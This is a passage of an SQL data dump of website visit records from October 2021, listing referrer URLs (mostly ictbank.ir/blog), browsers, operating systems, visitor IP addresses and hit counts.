(14385,'2021-10-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.219','000',0,2,0),
(14386,'2021-10-16','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','2.177.33.11','000',0,4,0),
(14387,'2021-10-16','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.146','000',0,2,0),
(14388,'2021-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.197.14','000',0,1,0),
(14389,'2021-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14390,'2021-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14391,'2021-10-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14392,'2021-10-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.203.88.30','000',0,1,0),
(14393,'2021-10-16','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','45.87.184.0','000',0,5,0),
(14394,'2021-10-17','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(14395,'2021-10-17','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,48,0),
(14396,'2021-10-17','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.250.63.49','000',0,1,0),
(14397,'2021-10-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','183.18.52.59','000',0,3,0),
(14398,'2021-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.252.172.187','000',0,2,0),
(14399,'2021-10-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14400,'2021-10-17','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.205.252.249','000',0,1,0),
(14401,'2021-10-17','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.73.4.172','000',0,1,0),
(14402,'2021-10-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.134.248.249','000',0,1,0),
(14403,'2021-10-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14404,'2021-10-17','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','63.35.188.106','000',0,1,0),
(14405,'2021-10-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14406,'2021-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(14407,'2021-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14408,'2021-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14409,'2021-10-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14410,'2021-10-17','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.253.153.123','000',0,1,0),
(14411,'2021-10-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(14412,'2021-10-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(14413,'2021-10-17','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.248.103.164','000',0,1,0),
(14414,'2021-10-18','http://ictbank.ir/','QQ Browser','Windows','6.1',NULL,NULL,'','173.213.84.171','000',0,3,0),
(14415,'2021-10-18','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.171','000',0,1,0),
(14416,'2021-10-18','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.70','000',0,1,0),
(14417,'2021-10-18','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.138','000',0,2,0),
(14418,'2021-10-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.63.144','000',0,16,0),
(14419,'2021-10-18','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,72,0),
(14420,'2021-10-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.147.212.80','000',0,3,0),
(14421,'2021-10-18','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.241.161.251','000',0,1,0),
(14422,'2021-10-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.228.51','000',0,1,0),
(14423,'2021-10-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.105.254.60','000',0,24,0),
(14424,'2021-10-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.63.163.114','000',0,3,0),
(14425,'2021-10-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14426,'2021-10-18','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','185.85.163.242','000',0,2,0),
(14427,'2021-10-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14428,'2021-10-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.167.133.27','000',0,1,0),
(14429,'2021-10-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14430,'2021-10-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(14431,'2021-10-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,3,0),
(14432,'2021-10-18','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','63.35.187.79','000',0,1,0),
(14433,'2021-10-18','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','3.249.212.220','000',0,2,0),
(14434,'2021-10-19','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,24,0),
(14435,'2021-10-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(14436,'2021-10-19','android-app://com.google.android.gm/','Chrome','Android','11',NULL,NULL,'','181.167.32.83','000',0,3,0),
(14437,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','212.102.57.73','000',0,2,0),
(14438,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','212.102.57.7','000',0,1,0),
(14439,'2021-10-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(14440,'2021-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.243.57','000',0,2,0),
(14441,'2021-10-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14442,'2021-10-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(14443,'2021-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(14444,'2021-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.196.59','000',0,1,0),
(14445,'2021-10-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.129.58','000',0,1,0),
(14446,'2021-10-19','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.245.116.214','000',0,1,0),
(14447,'2021-10-19','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.245','000',0,1,0),
(14448,'2021-10-19','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.235','000',0,1,0),
(14449,'2021-10-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(14450,'2021-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.247','000',0,2,0),
(14451,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(14452,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(14453,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14454,'2021-10-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14455,'2021-10-19','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14456,'2021-10-20','http://ictbank.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','185.85.163.242','000',0,1,0),
(14457,'2021-10-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(14458,'2021-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.202.170.10','000',0,2,0),
(14459,'2021-10-20','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.244.178.29','000',0,1,0),
(14460,'2021-10-20','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.230','000',0,1,0),
(14461,'2021-10-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14462,'2021-10-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(14463,'2021-10-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.46.104.167','000',0,1,0),
(14464,'2021-10-20','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','176.111.173.122','000',0,2,0),
(14465,'2021-10-20','https://www.bing.com','Chrome','OS X','10.8.0',NULL,NULL,'','138.68.135.208','000',0,3,0),
(14466,'2021-10-20','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.77.108.138','000',0,1,0),
(14467,'2021-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.195.77','000',0,2,0),
(14468,'2021-10-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(14469,'2021-10-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.71','000',0,3,0),
(14470,'2021-10-20','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','173.236.176.103','000',0,1,0),
(14471,'2021-10-20','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','187.45.193.218','000',0,1,0),
(14472,'2021-10-20','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','164.90.131.1','000',0,1,0),
(14473,'2021-10-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.249.84','000',0,2,0),
(14474,'2021-10-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.26.225','000',0,1,0),
(14475,'2021-10-20','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.128.156.205','000',0,4,0),
(14476,'2021-10-20','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(14477,'2021-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(14478,'2021-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(14479,'2021-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(14480,'2021-10-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14481,'2021-10-20','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.145','000',0,2,0),
(14482,'2021-10-21','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.138','000',0,4,0),
(14483,'2021-10-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.196.246.192','000',0,13,0),
(14484,'2021-10-21','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.227.122','000',0,2,0),
(14485,'2021-10-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(14486,'2021-10-21','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(14487,'2021-10-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14488,'2021-10-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14489,'2021-10-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.15','000',0,2,0),
(14490,'2021-10-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.142.80.97','000',0,1,0),
(14491,'2021-10-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','156.146.38.130','000',0,5,0),
(14492,'2021-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.24.65','000',0,2,0),
(14493,'2021-10-21','https://duckduckgo.com/','Chrome','Windows','10.0',NULL,NULL,'','81.147.177.101','000',0,1,0),
(14494,'2021-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.52.41.238','000',0,1,0),
(14495,'2021-10-21','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.20','000',0,1,0),
(14496,'2021-10-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14497,'2021-10-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','164.138.128.82','000',0,1,0),
(14498,'2021-10-21','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','185.34.33.2','000',0,1,0),
(14499,'2021-10-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.17.23','000',0,1,0),
(14500,'2021-10-21','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(14501,'2021-10-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.85.127','000',0,1,0),
(14502,'2021-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(14503,'2021-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(14504,'2021-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14505,'2021-10-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14506,'2021-10-21','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','67.227.236.24','000',0,1,0),
(14507,'2021-10-21','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.220.111.106','000',0,4,0),
(14508,'2021-10-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14509,'2021-10-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(14510,'2021-10-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(14511,'2021-10-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,3,0),
(14512,'2021-10-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,3,0),
(14513,'2021-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(14514,'2021-10-22','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.83.130.129','000',0,5,0),
(14515,'2021-10-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,4,0),
(14516,'2021-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.41.15.20','000',0,1,0),
(14517,'2021-10-22','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.252.223.67','000',0,2,0),
(14518,'2021-10-22','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.217','000',0,1,0),
(14519,'2021-10-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.46.201.71','000',0,2,0),
(14520,'2021-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.233.118','000',0,2,0),
(14521,'2021-10-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14522,'2021-10-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.234','000',0,2,0),
(14523,'2021-10-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,2,0),
(14524,'2021-10-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.35.31.203','000',0,1,0),
(14525,'2021-10-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(14526,'2021-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14527,'2021-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14528,'2021-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14529,'2021-10-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(14530,'2021-10-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.9.250.120','000',0,3,0),
(14531,'2021-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.41.15.20','000',0,2,0),
(14532,'2021-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.200.76','000',0,2,0),
(14533,'2021-10-23','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.206','000',0,1,0),
(14534,'2021-10-23','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','192.198.206.26','000',0,2,0),
(14535,'2021-10-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.129.220.209','000',0,1,0),
(14536,'2021-10-23','http://design-arena.ir/blog','QQ Browser','Windows','6.1',NULL,NULL,'','135.181.217.184','000',0,2,0),
(14537,'2021-10-23','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','207.7.81.110','000',0,1,0),
(14538,'2021-10-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14539,'2021-10-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14540,'2021-10-23','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','51.222.42.168','000',0,1,0),
(14541,'2021-10-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(14542,'2021-10-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14543,'2021-10-23','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','5.134.4.120','000',0,2,0),
(14544,'2021-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.137.29','000',0,2,0),
(14545,'2021-10-23','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.231.32.223','000',0,13,0),
(14546,'2021-10-23','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','50.3.89.5','000',0,2,0),
(14547,'2021-10-23','http://ictbank.ir/blog','Opera','Unknown','Unknown',NULL,NULL,'','192.200.158.225','000',0,2,0),
(14548,'2021-10-23','http://simplesite.com','Chrome','Windows','5.1',NULL,NULL,'','45.63.95.184','000',0,2,0),
(14549,'2021-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.6.140','000',0,1,0),
(14550,'2021-10-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.244.18','000',0,1,0),
(14551,'2021-10-23','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.216','000',0,1,0),
(14552,'2021-10-23','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.233','000',0,1,0),
(14553,'2021-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(14554,'2021-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(14555,'2021-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14556,'2021-10-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14557,'2021-10-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.83.11.108','000',0,2,0),
(14558,'2021-10-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(14559,'2021-10-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14560,'2021-10-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(14561,'2021-10-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14562,'2021-10-24','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.234.88.254','000',0,2,0),
(14563,'2021-10-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14564,'2021-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.86.230','000',0,2,0),
(14565,'2021-10-24','http://ictbank.ir/','Firefox','Windows','6.2',NULL,NULL,'','185.254.75.43','000',0,1,0),
(14566,'2021-10-24','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.163.249','000',0,1,0),
(14567,'2021-10-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(14568,'2021-10-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.244.132','000',0,1,0),
(14569,'2021-10-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.179.164','000',0,1,0),
(14570,'2021-10-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14571,'2021-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(14572,'2021-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(14573,'2021-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(14574,'2021-10-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14575,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','195.78.54.191','000',0,2,0),
(14576,'2021-10-25','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','84.241.40.117','000',0,1,0),
(14577,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.69.58.136','000',0,1,0),
(14578,'2021-10-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(14579,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.189.245','000',0,2,0),
(14580,'2021-10-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.63.163.114','000',0,2,0),
(14581,'2021-10-25','http://ictbank.ir/blog','Firefox','OS X','10.13',NULL,NULL,'','23.88.63.113','000',0,1,0),
(14582,'2021-10-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.182.137','000',0,2,0),
(14583,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.84.71','000',0,1,0),
(14584,'2021-10-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14585,'2021-10-25','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','139.59.146.186','000',0,2,0),
(14586,'2021-10-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14587,'2021-10-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','88.235.57.122','000',0,2,0),
(14588,'2021-10-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14589,'2021-10-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14590,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.182.158.234','000',0,1,0),
(14591,'2021-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(14592,'2021-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(14593,'2021-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14594,'2021-10-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14595,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.74.25','000',0,2,0),
(14596,'2021-10-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14597,'2021-10-26','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.98','000',0,1,0),
(14598,'2021-10-26','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','49.12.233.123','000',0,2,0),
(14599,'2021-10-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.166.197','000',0,10,0),
(14600,'2021-10-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,4,0),
(14601,'2021-10-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.218.166','000',0,1,0),
(14602,'2021-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','24.252.84.192','000',0,10,0),
(14603,'2021-10-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.216.70','000',0,1,0),
(14604,'2021-10-26','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','197.98.201.87','000',0,1,0),
(14605,'2021-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.254.252','000',0,2,0),
(14606,'2021-10-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(14607,'2021-10-26','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(14608,'2021-10-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14609,'2021-10-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.71.35','000',0,1,0),
(14610,'2021-10-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,3,0),
(14611,'2021-10-26','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','151.234.128.81','000',0,2,0),
(14612,'2021-10-26','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.193.83','000',0,1,0),
